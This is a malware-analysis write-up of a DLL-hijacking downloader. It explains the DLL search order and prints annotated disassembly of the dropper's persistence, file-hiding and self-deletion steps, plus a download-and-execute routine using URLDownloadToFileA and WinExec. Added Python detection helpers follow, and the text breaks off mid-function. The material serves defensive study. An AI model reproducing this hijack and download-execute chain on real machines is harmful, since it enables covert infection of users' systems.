I caught a sample of a DLL-hijacking downloader, which is a good opportunity to learn from it, so here is a step-by-step analysis of how it is implemented.
The DLL hijacking technique: when an executable runs, the Windows loader maps the executable module into the process address space, parses the module's import table, locates every DLL it needs and maps those into the process address space as well.

Because the import table holds only DLL names and no paths, the loader has to search the disk for each DLL file. It first tries to load the DLL from the directory the program is in; if it is not found there, it looks in the Windows system directory, and finally in each directory listed in the PATH environment variable. This behaviour can be exploited: plant a DLL with the same name as a system DLL, give it the same export table, and have every exported function forward to the real system DLL. When the program calls the system DLL it first reaches the forged copy in its own directory, which does its own work and then jumps to the same-named function in the genuine DLL. Put vividly, the system DLL has been hijacked. Everything in this article was tested locally and is provided for educational and research purposes; key sensitive details and code have been removed to prevent malicious use. The author does not encourage or support any form of illegal activity.
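The search-order behaviour just described, as an added Python model (not code from the article or from the sample): it follows the simplified order given above (application directory, then the system directory, then PATH) and reports any imported DLL that would be satisfied by a copy shadowing the one in the system directory. The file list and the import list are constructed for the sample's case (cmd.exe copied next to a planted lpk.dll); a real loader also consults KnownDLLs and SafeDllSearchMode, which this model deliberately ignores.

```python
# Simplified Windows DLL search-order resolver (added example; constructed data).
# Order modelled: application directory -> system directory -> PATH directories,
# exactly as the article describes it.  KnownDLLs / SafeDllSearchMode are NOT modelled.
from typing import Dict, Iterable, List, Optional, Set


def search_order(app_dir: str, system_dir: str, path_dirs: List[str]) -> List[str]:
    """Directories in the order the loader tries them (simplified, per the article)."""
    return [app_dir, system_dir, *path_dirs]


def resolve_dll(name: str, order: List[str], existing: Set[str]) -> Optional[str]:
    """Return the first candidate path that exists on 'disk', or None if the DLL is missing."""
    for directory in order:
        candidate = (directory.rstrip("\\") + "\\" + name).lower()
        if candidate in existing:
            return candidate
    return None


def audit_imports(imports: Iterable[str], app_dir: str, system_dir: str,
                  path_dirs: List[str], existing: Set[str]) -> Dict[str, str]:
    """Map each imported DLL that resolves somewhere other than the system-directory
    copy (although that copy exists) to the path that shadows it: a hijack candidate."""
    order = search_order(app_dir, system_dir, path_dirs)
    shadowed: Dict[str, str] = {}
    for name in imports:
        winner = resolve_dll(name, order, existing)
        genuine = (system_dir.rstrip("\\") + "\\" + name).lower()
        if winner is not None and genuine in existing and winner != genuine:
            shadowed[name] = winner
    return shadowed


# Constructed file-system state mirroring the sample: cmd.exe copied to
# C:\Windows\svchost.exe with a planted lpk.dll beside it.  Paths are lower-cased.
EXISTING: Set[str] = {p.lower() for p in [
    r"C:\Windows\svchost.exe", r"C:\Windows\lpk.dll", r"C:\Windows\wsock32x.dll",
    r"C:\Windows\System32\lpk.dll", r"C:\Windows\System32\kernel32.dll",
    r"C:\Windows\System32\user32.dll",
]}
# Constructed import list for the renamed cmd.exe (lpk.dll is pulled in via the GDI/USER chain).
CMD_IMPORTS = ["kernel32.dll", "user32.dll", "lpk.dll"]


def demo() -> Dict[str, str]:
    """Audit the sample's layout: only lpk.dll should come back as shadowed."""
    return audit_imports(CMD_IMPORTS, r"C:\Windows", r"C:\Windows\System32",
                         [r"C:\Tools"], EXISTING)


if __name__ == "__main__":
    for dll, path in demo().items():
        print(f"{dll} would be loaded from {path} instead of the system copy")
```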
1. Create a mutex

CODE:00404844                 push    ebx
CODE:00404845                 push    offset Name         ; lpName = 'exe'
CODE:0040484A                 push    0FFFFFFFFh          ; int (bInitialOwner)
CODE:0040484C                 push    0                   ; lpMutexAttributes
CODE:0040484E                 call    sub_403EC4          ; mutex creation routine
CODE:00404853                 call    GetLastError_0
CODE:00404858                 cmp     eax, 0B7h           ; ERROR_ALREADY_EXISTS (183): another instance is running
CODE:0040485D                 jnz     short loc_404861
CODE:0040485F                 mov     bl, 1
CODE:00404861 loc_404861:                                 ; CODE XREF: sub_404844+19j
CODE:00404861                 mov     eax, ebx
CODE:00404863                 pop     ebx
CODE:00404864                 retn

2. Get the Windows directory

CODE:004041DB                 push    100h                ; uSize
CODE:004041E0                 push    ebx                 ; lpBuffer (ebx keeps the Windows directory from here on)
CODE:004041E1                 call    GetWindowsDirectoryA
3. Delete the scheduled-task file C:\WINDOWS\Tasks\At1.job

CODE:004041FD                 mov     edx, offset dword_404530 ; '\tasks\at1.job'
CODE:00404202                 call    sub_403760          ; append to the Windows directory path
CODE:00404207                 mov     eax, [ebp+var_4]
CODE:0040420A                 call    sub_403840
CODE:0040420F                 push    eax                 ; lpFileName
CODE:00404210                 call    DeleteFileA
4. Reset the attributes of wsock32x.dll, lpk.dll and avp.exe in the Windows directory to normal, delete those files, then copy the trojan itself into the Windows directory under the new name avp.exe.

CODE:0040422C                 mov     edx, offset dword_404548 ; '\wsock32x.dll'
CODE:00404231                 call    sub_403760
CODE:00404236                 mov     eax, [ebp+var_8]
CODE:00404239                 call    sub_403840
CODE:0040423E                 push    eax                 ; lpFileName
CODE:0040423F                 call    SetFileAttributesA  ; its dwFileAttributes (80h) was pushed before this excerpt
CODE:00404244                 push    80h                 ; dwFileAttributes = FILE_ATTRIBUTE_NORMAL
CODE:00404249                 lea     eax, [ebp+var_C]
CODE:0040424C                 mov     edx, ebx            ; Windows directory
CODE:0040424E                 mov     ecx, 101h
CODE:00404253                 call    sub_403740
CODE:00404258                 lea     eax, [ebp+var_C]
CODE:0040425B                 mov     edx, offset dword_404560 ; '\lpk.dll'
CODE:00404260                 call    sub_403760
CODE:00404265                 mov     eax, [ebp+var_C]
CODE:00404268                 call    sub_403840
CODE:0040426D                 push    eax                 ; lpFileName
CODE:0040426E                 call    SetFileAttributesA
CODE:00404273                 push    80h                 ; dwFileAttributes = FILE_ATTRIBUTE_NORMAL
CODE:00404278                 lea     eax, [ebp+var_10]
CODE:0040427B                 mov     edx, ebx
CODE:0040427D                 mov     ecx, 101h
CODE:00404282                 call    sub_403740
CODE:00404287                 lea     eax, [ebp+var_10]
CODE:0040428A                 mov     edx, offset dword_404574 ; '\avp.exe'
CODE:0040428F                 call    sub_403760
CODE:00404294                 mov     eax, [ebp+var_10]
CODE:00404297                 call    sub_403840
CODE:0040429C                 push    eax                 ; lpFileName
CODE:0040429D                 call    SetFileAttributesA
CODE:004042A2                 lea     eax, [ebp+var_14]
CODE:004042A5                 mov     edx, ebx
CODE:004042A7                 mov     ecx, 101h
CODE:004042AC                 call    sub_403740
CODE:004042B1                 lea     eax, [ebp+var_14]
CODE:004042B4                 mov     edx, offset dword_404548 ; '\wsock32x.dll'
CODE:004042B9                 call    sub_403760
CODE:004042BE                 mov     eax, [ebp+var_14]
CODE:004042C1                 call    sub_403840
CODE:004042C6                 push    eax                 ; lpFileName
CODE:004042C7                 call    DeleteFileA
CODE:004042CC                 lea     eax, [ebp+var_18]
CODE:004042CF                 mov     edx, ebx
CODE:004042D1                 mov     ecx, 101h
CODE:004042D6                 call    sub_403740
CODE:004042DB                 lea     eax, [ebp+var_18]
CODE:004042DE                 mov     edx, offset dword_404560 ; '\lpk.dll'
CODE:004042E3                 call    sub_403760
CODE:004042E8                 mov     eax, [ebp+var_18]
CODE:004042EB                 call    sub_403840
CODE:004042F0                 push    eax                 ; lpFileName
CODE:004042F1                 call    DeleteFileA
CODE:004042F6                 lea     eax, [ebp+var_1C]
CODE:004042F9                 mov     edx, ebx
CODE:004042FB                 mov     ecx, 101h
CODE:00404300                 call    sub_403740
CODE:00404305                 lea     eax, [ebp+var_1C]
CODE:00404308                 mov     edx, offset dword_404574 ; '\avp.exe'
CODE:0040430D                 call    sub_403760
CODE:00404312                 mov     eax, [ebp+var_1C]
CODE:00404315                 call    sub_403840
CODE:0040431A                 push    eax                 ; lpFileName
CODE:0040431B                 call    DeleteFileA
CODE:00404320                 push    0                   ; bFailIfExists
CODE:00404322                 lea     eax, [ebp+var_20]
CODE:00404325                 mov     edx, ebx
CODE:00404327                 mov     ecx, 101h
CODE:0040432C                 call    sub_403740
CODE:00404331                 lea     eax, [ebp+var_20]
CODE:00404334                 mov     edx, offset dword_404574 ; '\avp.exe'
CODE:00404339                 call    sub_403760
CODE:0040433E                 mov     eax, [ebp+var_20]
CODE:00404341                 call    sub_403840
CODE:00404346                 push    eax                 ; lpNewFileName  (Windows dir\avp.exe)
CODE:00404347                 lea     edx, [ebp+var_24]
CODE:0040434A                 xor     eax, eax
CODE:0040434C                 call    sub_4026F0          ; path of the trojan's own executable
CODE:00404351                 mov     eax, [ebp+var_24]
CODE:00404354                 call    sub_403840
CODE:00404359                 push    eax                 ; lpExistingFileName
CODE:0040435A                 call    CopyFileA
5. Drop lpk.dll and wsock32x.dll into the Windows directory

CODE:00404371                 mov     edx, offset dword_404560 ; '\lpk.dll'
CODE:00404376                 call    sub_403760
CODE:0040437B                 mov     ecx, [ebp+var_28]   ; destination path
CODE:0040437E                 mov     edx, offset dword_404588 ; 'LPK'      (resource name)
CODE:00404383                 mov     eax, offset aExefile     ; 'exefile'  (resource type)
CODE:00404388                 call    sub_4040A8          ; resource-extraction routine
CODE:0040438D                 lea     eax, [ebp+var_2C]
CODE:00404390                 mov     edx, ebx            ; Windows directory
CODE:00404392                 mov     ecx, 101h
CODE:00404397                 call    sub_403740
CODE:0040439C                 lea     eax, [ebp+var_2C]
CODE:0040439F                 mov     edx, offset dword_404548 ; '\wsock32x.dll'
CODE:004043A4                 call    sub_403760
CODE:004043A9                 mov     ecx, [ebp+var_2C]   ; destination path
CODE:004043AC                 mov     edx, offset aWsock32x    ; 'wsock32x' (resource name)
CODE:004043B1                 mov     eax, offset aExefile     ; 'exefile'  (resource type)
CODE:004043B6                 call    sub_4040A8          ; resource-extraction routine
6. Copy cmd.exe from system32 into the Windows directory under the name svchost.exe, set the attributes of svchost.exe, avp.exe, wsock32x.dll and lpk.dll to read-only, hidden and system, then run svchost.exe.

CODE:004043BB                 push    0                   ; bFailIfExists
CODE:004043BD                 lea     eax, [ebp+var_30]
CODE:004043C0                 mov     edx, ebx            ; Windows directory
CODE:004043C2                 mov     ecx, 101h
CODE:004043C7                 call    sub_403740
CODE:004043CC                 lea     eax, [ebp+var_30]
CODE:004043CF                 mov     edx, offset dword_4045B8 ; '\svchost.exe'
CODE:004043D4                 call    sub_403760
CODE:004043D9                 mov     eax, [ebp+var_30]
CODE:004043DC                 call    sub_403840
CODE:004043E1                 push    eax                 ; lpNewFileName
CODE:004043E2                 lea     eax, [ebp+var_34]
CODE:004043E5                 mov     edx, ebx
CODE:004043E7                 mov     ecx, 101h
CODE:004043EC                 call    sub_403740
CODE:004043F1                 lea     eax, [ebp+var_34]
CODE:004043F4                 mov     edx, offset aSystem32Cmd_ex ; '\system32\cmd.exe'
CODE:004043F9                 call    sub_403760
CODE:004043FE                 mov     eax, [ebp+var_34]
CODE:00404401                 call    sub_403840
CODE:00404406                 push    eax                 ; lpExistingFileName
CODE:00404407                 call    CopyFileA
CODE:0040440C                 push    23h                 ; dwFileAttributes = READONLY | HIDDEN | ARCHIVE
CODE:0040440E                 lea     eax, [ebp+var_38]
CODE:00404411                 mov     edx, ebx
CODE:00404413                 mov     ecx, 101h
CODE:00404418                 call    sub_403740
CODE:0040441D                 lea     eax, [ebp+var_38]
CODE:00404420                 mov     edx, offset dword_4045B8 ; '\svchost.exe'
CODE:00404425                 call    sub_403760
CODE:0040442A                 mov     eax, [ebp+var_38]
CODE:0040442D                 call    sub_403840
CODE:00404432                 push    eax                 ; lpFileName
CODE:00404433                 call    SetFileAttributesA
CODE:00404438                 push    23h                 ; dwFileAttributes
CODE:0040443A                 lea     eax, [ebp+var_3C]
CODE:0040443D                 mov     edx, ebx
CODE:0040443F                 mov     ecx, 101h
CODE:00404444                 call    sub_403740
CODE:00404449                 lea     eax, [ebp+var_3C]
CODE:0040444C                 mov     edx, offset dword_404574 ; '\avp.exe'
CODE:00404451                 call    sub_403760
CODE:00404456                 mov     eax, [ebp+var_3C]
CODE:00404459                 call    sub_403840
CODE:0040445E                 push    eax                 ; lpFileName
CODE:0040445F                 call    SetFileAttributesA
CODE:00404464                 push    23h                 ; dwFileAttributes
CODE:00404466                 lea     eax, [ebp+var_40]
CODE:00404469                 mov     edx, ebx
CODE:0040446B                 mov     ecx, 101h
CODE:00404470                 call    sub_403740
CODE:00404475                 lea     eax, [ebp+var_40]
CODE:00404478                 mov     edx, offset dword_404548 ; '\wsock32x.dll'
CODE:0040447D                 call    sub_403760
CODE:00404482                 mov     eax, [ebp+var_40]
CODE:00404485                 call    sub_403840
CODE:0040448A                 push    eax                 ; lpFileName
CODE:0040448B                 call    SetFileAttributesA
CODE:00404490                 push    23h                 ; dwFileAttributes
CODE:00404492                 lea     eax, [ebp+var_44]
CODE:00404495                 mov     edx, ebx
CODE:00404497                 mov     ecx, 101h
CODE:0040449C                 call    sub_403740
CODE:004044A1                 lea     eax, [ebp+var_44]
CODE:004044A4                 mov     edx, offset dword_404560 ; '\lpk.dll'
CODE:004044A9                 call    sub_403760
CODE:004044AE                 mov     eax, [ebp+var_44]
CODE:004044B1                 call    sub_403840
CODE:004044B6                 push    eax                 ; lpFileName
CODE:004044B7                 call    SetFileAttributesA
CODE:004044BC                 push    0                   ; uCmdShow = SW_HIDE
CODE:004044BE                 lea     eax, [ebp+var_48]
CODE:004044C1                 mov     edx, ebx
CODE:004044C3                 mov     ecx, 101h
CODE:004044C8                 call    sub_403740
CODE:004044CD                 lea     eax, [ebp+var_48]
CODE:004044D0                 mov     edx, offset dword_4045B8 ; '\svchost.exe'
CODE:004044D5                 call    sub_403760
CODE:004044DA                 mov     eax, [ebp+var_48]
CODE:004044DD                 call    sub_403840
CODE:004044E2                 push    eax                 ; lpCmdLine (Windows dir\svchost.exe, i.e. the renamed cmd.exe)
CODE:004044E3                 call    WinExec
7. Add a scheduled task for the avp.exe trojan file, so that the trojan runs at a set time.

CODE:00403F84                 push    ebp
CODE:00403F85                 mov     ebp, esp
CODE:00403F87                 add     esp, 0FFFFFEF0h
CODE:00403F8D                 push    ebx
CODE:00403F8E                 push    esi
CODE:00403F8F                 xor     eax, eax
CODE:00403F91                 mov     [ebp+var_110], eax
CODE:00403F97                 mov     [ebp+var_8], eax
CODE:00403F9A                 xor     eax, eax
CODE:00403F9C                 push    ebp
CODE:00403F9D                 push    offset loc_404048   ; exception handler
CODE:00403FA2                 push    dword ptr fs:[eax]
CODE:00403FA5                 mov     fs:[eax], esp
CODE:00403FA8                 push    100h                ; uSize
CODE:00403FAD                 lea     eax, [ebp+Buffer]
CODE:00403FB3                 push    eax                 ; lpBuffer
CODE:00403FB4                 call    GetWindowsDirectoryA
CODE:00403FB9                 lea     eax, [ebp+var_8]
CODE:00403FBC                 lea     edx, [ebp+Buffer]
CODE:00403FC2                 mov     ecx, 101h
CODE:00403FC7                 call    sub_4039D0
CODE:00403FCC                 mov     eax, 10h
CODE:00403FD1                 call    sub_4024A0          ; allocate 16 bytes: the AT_INFO structure
CODE:00403FD6                 mov     esi, eax
CODE:00403FD8                 mov     eax, 4
CODE:00403FDD                 call    sub_4024A0          ; allocate 4 bytes for the returned job id
CODE:00403FE2                 mov     [ebp+JobId], eax
CODE:00403FE5                 mov     dword ptr [esi], 9  ; AT_INFO.JobTime (milliseconds after midnight)
CODE:00403FEB                 xor     eax, eax
CODE:00403FED                 mov     [esi+4], eax        ; AT_INFO.DaysOfMonth = 0
CODE:00403FF0                 mov     byte ptr [esi+8], 0 ; AT_INFO.DaysOfWeek = 0
CODE:00403FF4                 lea     eax, [ebp+var_110]
CODE:00403FFA                 mov     ecx, offset aAvp_exe ; '\avp.exe'
CODE:00403FFF                 mov     edx, [ebp+var_8]    ; Windows directory
CODE:00404002                 call    sub_403A04
CODE:00404007                 mov     eax, [ebp+var_110]
CODE:0040400D                 call    sub_4039E8
CODE:00404012                 mov     [esi+0Ch], eax      ; AT_INFO.Command = Windows dir\avp.exe
CODE:00404015                 mov     byte ptr [esi+9], 1 ; AT_INFO.Flags = JOB_RUN_PERIODICALLY
CODE:00404019                 mov     eax, [ebp+JobId]
CODE:0040401C                 push    eax                 ; JobId
CODE:0040401D                 push    esi                 ; Buffer
CODE:0040401E                 push    0                   ; Servername (local machine)
CODE:00404020                 call    NetScheduleJobAdd
CODE:00404025                 test    eax, eax
CODE:00404027                 xor     eax, eax
CODE:00404029                 pop     edx
CODE:0040402A                 pop     ecx
CODE:0040402B                 pop     ecx
CODE:0040402C                 mov     fs:[eax], edx
CODE:0040402F                 push    offset loc_40404F
CODE:00404034 loc_404034:                                 ; CODE XREF: sub_403F84+C9j
CODE:00404034                 lea     eax, [ebp+var_110]
CODE:0040403A                 call    sub_403908
CODE:0040403F                 lea     eax, [ebp+var_8]
CODE:00404042                 call    sub_403908
CODE:00404047                 retn
8. Create a batch file, run it with CreateProcessA, and use it to delete itself. That is the whole flow of the trojan EXE; it is fairly simple.

CODE:004045E4                 push    ebp
CODE:004045E5                 mov     ebp, esp
CODE:004045E7                 add     esp, 0FFFFFDCCh
CODE:004045ED                 xor     edx, edx
CODE:004045EF                 mov     [ebp+var_230], edx
CODE:004045F5                 mov     [ebp+var_234], edx
CODE:004045FB                 mov     [ebp+var_228], edx
CODE:00404601                 mov     [ebp+var_22C], edx
CODE:00404607                 mov     [ebp+var_4], edx
CODE:0040460A                 xor     eax, eax
CODE:0040460C                 push    ebp
CODE:0040460D                 push    offset loc_4047BD   ; exception handler
CODE:00404612                 push    dword ptr fs:[eax]
CODE:00404615                 mov     fs:[eax], esp
CODE:00404618                 nop
CODE:00404619                 nop
CODE:0040461A                 nop
CODE:0040461B                 nop
CODE:0040461C                 nop
CODE:0040461D                 push    eax
CODE:0040461E                 pop     eax
CODE:0040461F                 nop
CODE:00404620                 lea     eax, [ebp+var_4]
CODE:00404623                 mov     edx, offset aCDeleteme_bat ; 'c:\Deleteme.bat'
CODE:00404628                 call    sub_40369C
CODE:0040462D                 mov     edx, [ebp+var_4]
CODE:00404630                 lea     eax, [ebp+var_1D0]  ; file record for the batch file
CODE:00404636                 call    sub_402A0C
CODE:0040463B                 lea     eax, [ebp+var_1D0]
CODE:00404641                 call    sub_4027A8          ; create the batch file
CODE:00404646                 call    sub_402594
CODE:0040464B                 mov     edx, offset dword_4047E8
CODE:00404650                 lea     eax, [ebp+var_1D0]
CODE:00404656                 call    sub_4038B0          ; write a line to the batch file
CODE:0040465B                 call    sub_402D28
CODE:00404660                 call    sub_402594
CODE:00404665                 push    offset dword_4047F8
CODE:0040466A                 lea     edx, [ebp+var_22C]
CODE:00404670                 xor     eax, eax
CODE:00404672                 call    sub_4026F0          ; path of the trojan's own executable
CODE:00404677                 push    [ebp+var_22C]
CODE:0040467D                 push    offset dword_404808
CODE:00404682                 lea     eax, [ebp+var_228]
CODE:00404688                 mov     edx, 3
CODE:0040468D                 call    sub_4037A4          ; concatenate the three pushed strings
CODE:00404692                 mov     edx, [ebp+var_228]
CODE:00404698                 lea     eax, [ebp+var_1D0]
CODE:0040469E                 call    sub_4038B0          ; write a line to the batch file
CODE:004046A3                 call    sub_402D28
CODE:004046A8                 call    sub_402594
CODE:004046AD                 push    offset dword_404814
CODE:004046B2                 lea     edx, [ebp+var_234]
CODE:004046B8                 xor     eax, eax
CODE:004046BA                 call    sub_4026F0          ; path of the trojan's own executable
CODE:004046BF                 push    [ebp+var_234]
CODE:004046C5                 push    offset dword_404808
CODE:004046CA                 push    offset dword_404828
CODE:004046CF                 lea     eax, [ebp+var_230]
CODE:004046D5                 mov     edx, 4
CODE:004046DA                 call    sub_4037A4          ; concatenate the four pushed strings
CODE:004046DF                 mov     edx, [ebp+var_230]
CODE:004046E5                 lea     eax, [ebp+var_1D0]
CODE:004046EB                 call    sub_4038B0          ; write a line to the batch file
CODE:004046F0                 call    sub_402D28
CODE:004046F5                 call    sub_402594
CODE:004046FA                 mov     edx, offset dword_40483C
CODE:004046FF                 lea     eax, [ebp+var_1D0]
CODE:00404705                 call    sub_4038B0          ; write a line to the batch file
CODE:0040470A                 call    sub_402D28
CODE:0040470F                 call    sub_402594
CODE:00404714                 lea     eax, [ebp+var_1D0]
CODE:0040471A                 call    sub_402AC8          ; close the batch file
CODE:0040471F                 call    sub_402594
CODE:00404724                 lea     eax, [ebp+StartupInfo]
CODE:0040472A                 xor     ecx, ecx
CODE:0040472C                 mov     edx, 44h
CODE:00404731                 call    sub_402B20          ; zero the 44h-byte STARTUPINFO
CODE:00404736                 mov     [ebp+StartupInfo.dwFlags], 1     ; STARTF_USESHOWWINDOW
CODE:00404740                 mov     [ebp+StartupInfo.wShowWindow], 0 ; SW_HIDE
CODE:00404749                 lea     eax, [ebp+ProcessInformation]
CODE:0040474F                 push    eax                 ; lpProcessInformation
CODE:00404750                 lea     eax, [ebp+StartupInfo]
CODE:00404756                 push    eax                 ; lpStartupInfo
CODE:00404757                 push    0                   ; lpCurrentDirectory
CODE:00404759                 push    0                   ; lpEnvironment
CODE:0040475B                 push    40h                 ; dwCreationFlags = IDLE_PRIORITY_CLASS
CODE:0040475D                 push    0                   ; bInheritHandles
CODE:0040475F                 push    0                   ; lpThreadAttributes
CODE:00404761                 push    0                   ; lpProcessAttributes
CODE:00404763                 mov     eax, [ebp+var_4]
CODE:00404766                 call    sub_403840
CODE:0040476B                 push    eax                 ; lpCommandLine = 'c:\Deleteme.bat'
CODE:0040476C                 push    0                   ; lpApplicationName
CODE:0040476E                 call    CreateProcessA
CODE:00404773                 test    eax, eax
CODE:00404775                 jz      short loc_40478F
CODE:00404777                 mov     eax, [ebp+ProcessInformation.hThread]
CODE:0040477D                 push    eax                 ; hObject
CODE:0040477E                 call    CloseHandle_0
CODE:00404783                 mov     eax, [ebp+ProcessInformation.hProcess]
CODE:00404789                 push    eax                 ; hObject
CODE:0040478A                 call    CloseHandle_0
CODE:0040478F loc_40478F:                                 ; CODE XREF: sub_4045E4+191j
CODE:0040478F                 nop
CODE:00404790                 nop
CODE:00404791                 nop
CODE:00404792                 nop
CODE:00404793                 nop
CODE:00404794                 push    eax
CODE:00404795                 pop     eax
CODE:00404796                 nop
CODE:00404797                 xor     eax, eax
CODE:00404799                 pop     edx
CODE:0040479A                 pop     ecx
CODE:0040479B                 pop     ecx
CODE:0040479C                 mov     fs:[eax], edx
CODE:0040479F                 push    offset loc_4047C4
CODE:004047A4 loc_4047A4:                                 ; CODE XREF: sub_4045E4+1DEj
CODE:004047A4                 lea     eax, [ebp+var_234]
CODE:004047AA                 mov     edx, 4
CODE:004047AF                 call    sub_403628
CODE:004047B4                 lea     eax, [ebp+var_4]
CODE:004047B7                 call    sub_403604
CODE:004047BC                 retn

Program flow of LPK.dll

1. Create a thread

.data:10001253                 push    esi
.data:10001254                 jnz     short loc_10001294
.data:10001256                 push    0                   ; lpThreadId
.data:10001258                 push    0                   ; dwCreationFlags
.data:1000125A                 push    0                   ; lpParameter
.data:1000125C                 push    offset StartAddress ; lpStartAddress
.data:10001261                 push    0                   ; dwStackSize
.data:10001263                 push    0                   ; lpThreadAttributes
.data:10001265                 call    CreateThread
.data:1000126B                 push    [esp+4+hLibModule]  ; hLibModule
.data:1000126F                 call    DisableThreadLibraryCalls

2. Load wsock32x.dll

.data:1000123D                 push    offset LibFileName  ; 'wsock32x.dll'
.data:10001242                 call    LoadLibraryA
.data:10001248                 push    1
.data:1000124A                 pop     eax
.data:1000124B                 retn    4

Program flow of wsock32x.dll

1. Download process

003E841E   push    ebp
003E841F   push    003E8645                   ; exception handler
003E8424   push    dword ptr fs:[eax]
003E8427   mov     dword ptr fs:[eax], esp
003E842A   push    003E8654                   ; FileName = "urlmon.dll"
003E842F   call    <jmp.kernel32.LoadLibraryA>
003E8434   push    0
003E8436   push    0
003E8438   lea     edx, dword ptr [ebp-1DC]
003E843E   mov     eax, 1
003E8443   call    003E83A8                   ; get the temp folder path
003E8448   lea     eax, dword ptr [ebp-1DC]
003E844E   mov     edx, 003E8668              ; "gk_drf.txt"
003E8453   call    003E3E90
003E8458   mov     eax, dword ptr [ebp-1DC]
003E845E   call    003E3F60
003E8463   push    eax                        ; local file name: <temp>\gk_drf.txt
003E8464   mov     eax, dword ptr [3E92A8]    ; URL of the txt file
003E8469   push    eax
003E846A   push    0
003E846C   call    <jmp.URLMON.URLDownloadToFileA> ; download the txt file from the remote server into the temp folder
003E8471   push    -1                         ; Alertable = TRUE
003E8473   push    0C8                        ; Timeout = 200 ms
003E8478   call    <jmp.kernel32.SleepEx>
003E847D   xor     eax, eax
003E847F   push    ebp
003E8480   push    003E8610                   ; exception handler
003E8485   push    dword ptr fs:[eax]
003E8488   mov     dword ptr fs:[eax], esp
003E848B   lea     edx, dword ptr [ebp-1E0]
003E8491   mov     eax, 1
003E8496   call    003E83A8                   ; get the temp folder path
003E849B   lea     eax, dword ptr [ebp-1E0]
003E84A1   mov     edx, 003E8668              ; "gk_drf.txt"
003E84A6   call    003E3E90
003E84AB   mov     edx, dword ptr [ebp-1E0]
003E84B1   lea     eax, dword ptr [ebp-1D8]
003E84B7   call    003E2978                   ; start reading the download URLs from the downloaded txt file
003E84BC   lea     eax, dword ptr [ebp-1D8]
003E84C2   call    003E2714
003E84C7   call    003E262C
003E84CC   xor     eax, eax
003E84CE   mov     dword ptr [ebp-4], eax     ; [ebp-4] = line counter
003E84D1   jmp     003E85DE
003E84D6   inc     dword ptr [ebp-4]
003E84D9   lea     edx, dword ptr [ebp-C]
003E84DC   lea     eax, dword ptr [ebp-1D8]
003E84E2   call    003E2C18                   ; read the next line (one URL)
003E84E7   lea     eax, dword ptr [ebp-1D8]
003E84ED   call    003E2C84
003E84F2   call    003E262C
003E84F7   lea     eax, dword ptr [ebp-8]
003E84FA   mov     edx, dword ptr [ebp-C]
003E84FD   call    003E3CA0
003E8502   xor     eax, eax
003E8504   push    ebp
003E8505   push    003E85D4                   ; exception handler
003E850A   push    dword ptr fs:[eax]
003E850D   mov     dword ptr fs:[eax], esp
003E8510   push    0
003E8512   push    0
003E8514   lea     edx, dword ptr [ebp-1E8]
003E851A   mov     eax, 1
003E851F   call    003E83A8                   ; get the temp folder path
003E8524   push    dword ptr [ebp-1E8]
003E852A   lea     edx, dword ptr [ebp-1EC]
003E8530   mov     eax, dword ptr [ebp-4]     ; line counter
003E8533   call    003E59A0                   ; counter -> string
003E8538   push    dword ptr [ebp-1EC]
003E853E   push    003E867C                   ; ".exe"
003E8543   lea     eax, dword ptr [ebp-1E4]
003E8549   mov     edx, 3
003E854E   call    003E3ED4                   ; <temp>\<counter>.exe
003E8553   mov     eax, dword ptr [ebp-1E4]
003E8559   call    003E3F60
003E855E   push    eax                        ; local file name
003E855F   mov     eax, dword ptr [ebp-8]     ; URL read from the txt
003E8562   call    003E3F60
003E8567   push    eax
003E8568   push    0
003E856A   call    <jmp.URLMON.URLDownloadToFileA> ; start downloading the trojan
003E856F   push    -1                         ; Alertable = TRUE
003E8571   push    64                         ; Timeout = 100 ms
003E8573   call    <jmp.kernel32.SleepEx>
003E8578   push    0
003E857A   lea     edx, dword ptr [ebp-1F4]
003E8580   mov     eax, 1
003E8585   call    003E83A8                   ; get the temp folder path
003E858A   push    dword ptr [ebp-1F4]
003E8590   lea     edx, dword ptr [ebp-1F8]
003E8596   mov     eax, dword ptr [ebp-4]
003E8599   call    003E59A0
003E859E   push    dword ptr [ebp-1F8]
003E85A4   push    003E867C                   ; ".exe"
003E85A9   lea     eax, dword ptr [ebp-1F0]
003E85AF   mov     edx, 3
003E85B4   call    003E3ED4                   ; <temp>\<counter>.exe again
003E85B9   mov     eax, dword ptr [ebp-1F0]
003E85BF   call    003E3F60
003E85C4   push    eax                        ; CmdLine
003E85C5   call    <jmp.kernel32.WinExec>     ; run the downloaded trojan
This downloader mainly works by running the renamed, disguised cmd.exe and using the special DLL lpk.dll to perform the hijack (cmd.exe is copied into the Windows directory as svchost.exe, so the lpk.dll dropped beside it sits in the application directory and is loaded ahead of the genuine one), which in turn loads wsock32x.dll, the DLL that does the downloading. Analysed as a whole, it turns out not to be complicated.
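A defender-side check for the artifacts the sections above describe (the files dropped into the Windows directory root, svchost.exe outside System32, the At1.job task file, c:\Deleteme.bat and the 23h attribute mask), as an added Python example that is not part of the original article. It runs over a constructed listing of (path, attribute bitmask) pairs so it works offline; on a live host the same functions can be fed with os.scandir() output and the attributes from GetFileAttributes.

```python
# Footprint check for this sample (added example; constructed directory listing).
import ntpath
from typing import Dict, Iterable, List, Tuple

FILE_ATTRIBUTE_READONLY = 0x01
FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04
FILE_ATTRIBUTE_ARCHIVE = 0x20
ATTR_MASK = FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_ARCHIVE
DROPPER_ATTRS = 0x23  # value the dropper passes to SetFileAttributesA: READONLY | HIDDEN | ARCHIVE

WINDIR = r"c:\windows"  # assumed install location
LEGIT_SVCHOST_DIRS = {WINDIR + r"\system32", WINDIR + r"\syswow64"}
DROPPED_IN_WINDIR = {"lpk.dll", "wsock32x.dll", "avp.exe", "svchost.exe"}


def classify(path: str, attrs: int) -> List[str]:
    """Return the reasons a file matches the sample's footprint (empty list = nothing found)."""
    p = path.lower()
    directory, name = ntpath.split(p)
    reasons: List[str] = []
    if name == "svchost.exe" and directory not in LEGIT_SVCHOST_DIRS:
        reasons.append("svchost.exe outside System32/SysWOW64 (the renamed cmd.exe)")
    if directory == WINDIR and name in DROPPED_IN_WINDIR:
        reasons.append(f"{name} dropped into the Windows directory root")
    if p == WINDIR + r"\tasks\at1.job":
        reasons.append("At1.job created through NetScheduleJobAdd")
    if p == r"c:\deleteme.bat":
        reasons.append("self-delete batch file")
    if reasons and (attrs & ATTR_MASK) == DROPPER_ATTRS:
        reasons.append("attributes 23h = READONLY|HIDDEN|ARCHIVE, as set by the dropper")
    return reasons


def scan(entries: Iterable[Tuple[str, int]]) -> Dict[str, List[str]]:
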